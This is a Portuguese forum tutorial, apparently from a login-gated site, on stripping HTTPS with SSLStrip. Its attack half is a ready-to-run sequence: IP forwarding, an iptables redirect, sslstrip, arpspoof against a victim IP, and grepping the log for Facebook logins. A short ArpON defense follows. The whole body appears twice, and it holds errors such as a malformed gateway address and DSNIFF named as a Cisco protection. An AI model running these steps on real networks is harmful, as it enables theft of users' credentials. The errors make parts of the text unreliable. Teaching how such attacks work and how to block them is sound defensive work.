O SSLStrip é uma ferramenta de ataque Man-in-the-Middle para sites com SSL/TLS (HTTPS, Certificado Digital), neste artigo vai visualizar como o ataque pode ser realizado e como evitar-lo.
Atenção: Roubo de Informações é CRIME, sujeito as penalidades da Lei: 12.737, o mal uso do conteúdo deste artigo é de sua total responsabilidade pois o mesmo tem como objetivo destacar os riscos que estamos expostos a realizar um simples acesso a conta do Facebook em uma LanHouse por exemplo.
Main-in-The-Middle: Homem no meio, em referência ao atacante que intercepta os dados de uma conexão, uma forma de ataque em que os dados trocados entre duas partes podem ser manipulados.
Cenário:
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 01
Ativar o ip_forward para redirecionar o tráfego.
root@kali:~# echo “1” > /proc/sys/net/ipv4/ip_forward
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 02
Crie a regra de redirecionamento no iptables da porta 80 para a porta 8080
root@kali:~# iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 8080
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 03
Execute o SSLSTRIP com as opções -a -l
root@kali:~# sslstrip -a -l 8080
-a : Acessa todo tráfego HTTP e SSL DE e PARA o Servidor
-l 8080 : Define a porta de escuta (listen) - Porta Padrão (10000)
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 04
Abra um novo Console e execute o ARPSPOOF
root@kali:~# arpspoof -i eth0 -t 10.10.10.134 10.10.2
-i eth0: Interface de Rede
-t: Define o Host Alvo
10.10.10.134 : IP da Vítima ( WIN-7 )
10.10.10.2: Gateway da Rede
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 05
Imagina que a Vítima obviamente sem saber acessar o Facebook e informa seu E-mail [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] e Senha P@ssw0rd e jamais perceberá que seus dados estão sendo capturados.
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 06
Um arquivo nomeado como sslstrip.log é criado contendo todo tráfego capturado, no caso do Facebook basta realizar uma busca dentro do arquivo como no exemplo abaixo:
root@kali:~# cat sslstrip.log | grep email=
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Como evitar este tipo de ataque?
Há diversas formas de evitar este tipo de ataque, para quem possui uma rede com equipamentos Cisco pode ativar o DSNIFF por exemplo, ou implantar uma solução Open Source ArpON( Arp handler inspectiON ) porém no mercado há diversas soluções/equipamentos que oferecem ótimos recursos para bloquear este tipo de ataque.
Passo 01
Instale o ArpON
root@kali:~# apt-get install arpon
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 02
Edite o arquivo de configuração do ArpON
root@kali:~# vim /etc/default/arpon
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 03
Remova o comentário # das linhas abaixo e altere a a execução de “no” para “yes”
# SARPI - Static Arp Inspection
DAEMON_OPTS=”-q -f /var/log/arpon/arpon.log -g -s”
# DARPI - Dynamic Arp Inspection
DAEMON_OPTS=”-q -f /var/log/arpon/arpon.log -g -s”
RUN=”yes”
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 04
Insira os Hosts e MAC que devem ser filtrados
root@kali:~# vim /etc/arpon.sarpi
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 05
Inicie o serviço do ArpON
root@kali:~# ../etc/init.d/arpon start
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 06
Como exibe no arquivo de log a Proteção em Tempo Real esta ativada! ( Realtime Protect actived! )
root@kali:~# cat /var/log/arpon/arpon.log
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Atenção: Roubo de Informações é CRIME, sujeito as penalidades da Lei: 12.737, o mal uso do conteúdo deste artigo é de sua total responsabilidade pois o mesmo tem como objetivo destacar os riscos que estamos expostos a realizar um simples acesso a conta do Facebook em uma LanHouse por exemplo.
Main-in-The-Middle: Homem no meio, em referência ao atacante que intercepta os dados de uma conexão, uma forma de ataque em que os dados trocados entre duas partes podem ser manipulados.
Cenário:
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 01
Ativar o ip_forward para redirecionar o tráfego.
root@kali:~# echo “1” > /proc/sys/net/ipv4/ip_forward
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 02
Crie a regra de redirecionamento no iptables da porta 80 para a porta 8080
root@kali:~# iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 8080
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 03
Execute o SSLSTRIP com as opções -a -l
root@kali:~# sslstrip -a -l 8080
-a : Acessa todo tráfego HTTP e SSL DE e PARA o Servidor
-l 8080 : Define a porta de escuta (listen) - Porta Padrão (10000)
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 04
Abra um novo Console e execute o ARPSPOOF
root@kali:~# arpspoof -i eth0 -t 10.10.10.134 10.10.2
-i eth0: Interface de Rede
-t: Define o Host Alvo
10.10.10.134 : IP da Vítima ( WIN-7 )
10.10.10.2: Gateway da Rede
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 05
Imagina que a Vítima obviamente sem saber acessar o Facebook e informa seu E-mail [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] e Senha P@ssw0rd e jamais perceberá que seus dados estão sendo capturados.
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 06
Um arquivo nomeado como sslstrip.log é criado contendo todo tráfego capturado, no caso do Facebook basta realizar uma busca dentro do arquivo como no exemplo abaixo:
root@kali:~# cat sslstrip.log | grep email=
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Como evitar este tipo de ataque?
Há diversas formas de evitar este tipo de ataque, para quem possui uma rede com equipamentos Cisco pode ativar o DSNIFF por exemplo, ou implantar uma solução Open Source ArpON( Arp handler inspectiON ) porém no mercado há diversas soluções/equipamentos que oferecem ótimos recursos para bloquear este tipo de ataque.
Passo 01
Instale o ArpON
root@kali:~# apt-get install arpon
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 02
Edite o arquivo de configuração do ArpON
root@kali:~# vim /etc/default/arpon
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 03
Remova o comentário # das linhas abaixo e altere a a execução de “no” para “yes”
# SARPI - Static Arp Inspection
DAEMON_OPTS=”-q -f /var/log/arpon/arpon.log -g -s”
# DARPI - Dynamic Arp Inspection
DAEMON_OPTS=”-q -f /var/log/arpon/arpon.log -g -s”
RUN=”yes”
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 04
Insira os Hosts e MAC que devem ser filtrados
root@kali:~# vim /etc/arpon.sarpi
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 05
Inicie o serviço do ArpON
root@kali:~# ../etc/init.d/arpon start
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 06
Como exibe no arquivo de log a Proteção em Tempo Real esta ativada! ( Realtime Protect actived! )
root@kali:~# cat /var/log/arpon/arpon.log
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]